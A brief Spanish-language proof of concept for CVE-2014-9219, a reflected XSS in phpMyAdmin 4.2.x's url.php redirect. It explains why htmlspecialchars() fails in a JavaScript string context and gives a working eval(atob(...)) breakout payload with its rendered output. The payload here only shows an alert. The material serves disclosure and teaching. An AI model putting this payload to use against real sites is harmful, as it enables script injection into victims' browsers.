
CVE-2014-9219 XSS POC
CVE-2014-9219 XSS POC
La vulnerabilidad es causada por un error de validación de entrada en la función de redirección en url.php en phpMyAdmin 4.2.x anterior a 4.2.13.1 al procesar el parámetro url. Un atacante remoto puede engañar a la víctima para que siga un enlace especialmente diseñado y ejecutar código HTML y script arbitrario en el navegador de la víctima en el contexto de seguridad del sitio web vulnerable.
phpMyAdmin: 4.2.0 - 4.2.13
El código vulnerable utiliza htmlspecialchars() para sanitizar el parámetro URL antes de insertarlo en un contexto de cadena de JavaScript:
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() está diseñado para contexto HTML, no para contexto de cadena de JavaScript. No escapa adecuadamente los caracteres que pueden salir de los literales de cadena de JavaScript.
url codificado:
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
url decodificado:
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
Salida HTML:
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.